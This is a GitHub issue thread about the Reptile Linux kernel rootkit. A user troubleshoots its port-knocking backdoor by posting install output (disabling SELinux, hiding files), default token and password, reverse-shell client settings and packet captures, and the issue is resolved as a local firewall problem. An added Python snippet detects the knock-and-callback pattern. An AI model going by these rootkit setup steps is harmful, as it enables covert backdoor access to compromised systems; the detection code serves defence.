f0rb1dd3n / Reptile

LKM Linux rootkit

Port Knocking not connecting back #77

Closed PracaGrande closed 4 years ago

PracaGrande commented 4 years ago

Hi, nice work on putting this code together!

I'm trying to use the Port Knocking feature but still couldn't make it work. On the backdoor I used the following settings:

Token: hax0r
Backdoor password: s3cr3t
SRC port: 50001

After configuring the client I send the magic packet to the compromised system but don't get a connection back. Using tcpdump I can see the magic packet arriving at the compromised system. I tried connecting to an open and a closed port on both TCP and UDP, but no luck. Does the reptile backdoor listen for the magic packet on any port?

Thanks

f0rb1dd3n commented 4 years ago

hey bro,

How are you installing Reptile (what is the whole list of configuration)? What system are you installing it on? Is this system on the same network as yours, or is it behind a firewall?

I need more information to help you use it, or to discover if this is a bug.

So, I have a bug list for Reptile, and I intend to publish some updates soon.

thx,

403

PracaGrande commented 4 years ago

Hi,

On the compromised machine, running Linux 2.6.32-754.22.1.el6.x86_64, I did:

# git clone https://github.com/f0rb1dd3n/Reptile.git
Initialized empty Git repository in /tmp/Reptile/.git/
remote: Enumerating objects: 793, done.
remote: Total 793 (delta 0), reused 0 (delta 0), pack-reused 793
Receiving objects: 100% (793/793), 243.44 KiB | 398 KiB/s, done.
Resolving deltas: 100% (434/434), done.
# cd Reptile/
# ./setup.sh install

############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n

SELinux config found on system!
Checking SELinux status... enforcing
Trying to set enforce permissive... DONE!
Trying to disable SELinux... DONE!
Maybe you will need to reboot!

Hide name (will be used to hide dirs/files) (default: reptile):
Auth token to magic packets (default: hax0r):
Backdoor password (default: s3cr3t):
Tag name that hide file contents (default: reptile):
Source port of magic packets (default: 666): 50001
Would you like to config reverse shell each X time? (y/n) (default: n): n

Token: hax0r
Backdoor password: s3cr3t
SRC port: 50001

TAGs to hide file contents:

#<reptile>
content to be hidden
#</reptile>

Configuring... DONE!
Compiling... DONE!
Copying files to /reptile... DONE!
Installing... DONE!

Would you like to remove this directory (/tmp/Reptile/) on exit? (Y/N) [default: N]: n
Not removing /tmp/Reptile/

Instalation has finished!

After reboot, reptile_cmd seems to be working well.

$ /reptile/reptile_cmd show
Success!
$ ls -lisa /reptile/
total 652
1569794   4 drwxr-xr-x.  2 root root   4096 Sep 20 17:35 .
      2   4 dr-xr-xr-x. 26 root root   4096 Sep 20 17:39 ..
1569797   8 -rwxrwxrwx.  1 root root   7048 Sep 20 17:35 reptile_cmd
1569795 572 -rwxrwxrwx.  1 root root 585543 Sep 20 17:35 reptile.ko
1569799   4 -rwxrwxrwx.  1 root root   2488 Sep 20 17:35 reptile_rc
1569796  56 -rwxrwxrwx.  1 root root  56224 Sep 20 17:35 reptile_reverse
1569798   4 -rwxrwxrwx.  1 root root    156 Sep 20 17:35 reptile_start

$ ls -lisa /sys/module/ | grep reptile
12653 0 drwxr-xr-x  5 root root 0 Sep 20 17:50 reptile

$ lsmod | grep reptile
reptile                13536  0

On the client side, on the same network segment, running Linux 3.10.0-1062.el7.x86_64:

$ ./setup.sh client

############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n

Configuring... DONE!
Compiling... DONE!

Your client is at bin/

And then:

reptile-client> show

VAR             VALUE                   DESCRIPTION

LHOST           192.168.118.157         Local host to receive the shell
LPORT           80                      Local port to receive the shell
SRCHOST         192.168.118.157         Source host on magic packets (spoof)
SRCPORT         50001                   Source port on magic packets (only for TCP/UDP)
RHOST           192.168.118.156         Remote host
RPORT           80                      Remote port (only for TCP/UDP)
PROT            TCP                     Protocol to send magic packet (ICMP/TCP/UDP)
PASS            s3cr3t                  Backdoor password (optional)
TOKEN           hax0r                   Token to trigger the shell

reptile-client> run
[*] Using password: s3cr3t
[*] Listening on port 80...
[*] TCP: 64 bytes was sent!

On the compromised system, running tcpdump, I can see that the client sends a TCP packet with the correct source port. It seems to correctly trigger the compromised system to send a packet back to port 80, but that packet is being refused.

17:55:25.600050 IP 192.168.118.157.50001 > 192.168.118.156.80: Flags [S], seq 1886257152:1886257176, win 8192, length 24
17:55:25.708139 IP 192.168.118.156.40622 > 192.168.118.157.80: Flags [S], seq 3216287733, win 14600, options [mss 1460,sackOK,TS val 688118 ecr 0,nop,wscale 7], length 0
17:55:25.708536 IP 192.168.118.157 > 192.168.118.156: ICMP host 192.168.118.157 unreachable - admin prohibited, length 68

Is there any additional listener or settings that I need to do on the client side?

Thank you
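A defender-side example, added here and not part of the thread or of the Reptile project: it parses tcpdump summary lines like the three quoted above and flags the sequence visible in that capture, an inbound SYN that carries a payload (a normal SYN has length 0) followed shortly by a fresh outbound SYN from the knocked host back to the sender. The sample lines are the ones from the report; the field names and the two-second window are my own choices.

```python
import re

# Constructed sample: the three tcpdump lines quoted in the report above.
SAMPLE = """\
17:55:25.600050 IP 192.168.118.157.50001 > 192.168.118.156.80: Flags [S], seq 1886257152:1886257176, win 8192, length 24
17:55:25.708139 IP 192.168.118.156.40622 > 192.168.118.157.80: Flags [S], seq 3216287733, win 14600, options [mss 1460,sackOK,TS val 688118 ecr 0,nop,wscale 7], length 0
17:55:25.708536 IP 192.168.118.157 > 192.168.118.156: ICMP host 192.168.118.157 unreachable - admin prohibited, length 68
"""

# tcpdump TCP summary line: timestamp, src.port > dst.port, flags, ..., length N
LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\].*length (?P<len>\d+)$"
)

def _secs(ts):
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)

def parse_tcp(lines):
    """Parse tcpdump TCP lines into dicts; non-TCP lines (e.g. the ICMP reject) are skipped."""
    pkts = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            pkts.append({"t": _secs(d["ts"]), "src": d["src"], "sport": int(d["sport"]),
                         "dst": d["dst"], "dport": int(d["dport"]), "flags": d["flags"], "len": int(d["len"])})
    return pkts

def find_knock_callbacks(lines, window=2.0):
    """Flag an inbound SYN that carries a payload (a normal SYN has length 0) and is
    followed within `window` seconds by a fresh SYN from the knocked host back to
    the sender: the trigger-then-connect-back sequence visible in the capture."""
    pkts = parse_tcp(lines)
    hits = []
    for i, p in enumerate(pkts):
        if p["flags"] != "S" or p["len"] == 0:
            continue  # only SYNs with data look like a knock
        for q in pkts[i + 1:]:
            if q["t"] - p["t"] > window:
                break
            if q["flags"] == "S" and q["src"] == p["dst"] and q["dst"] == p["src"]:
                hits.append({"knock_src": p["src"], "knock_sport": p["sport"],
                             "victim": p["dst"], "callback_port": q["dport"],
                             "delay": round(q["t"] - p["t"], 6)})
                break
    return hits

if __name__ == "__main__":
    for hit in find_knock_callbacks(SAMPLE.splitlines()):
        print(hit)
```

The ICMP "admin prohibited" line is not needed for the match; it is the client's own firewall rejecting the callback, which is what the thread turned out to be about.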

PracaGrande commented 4 years ago

Never mind, on the client system I was running iptables. It's working correctly.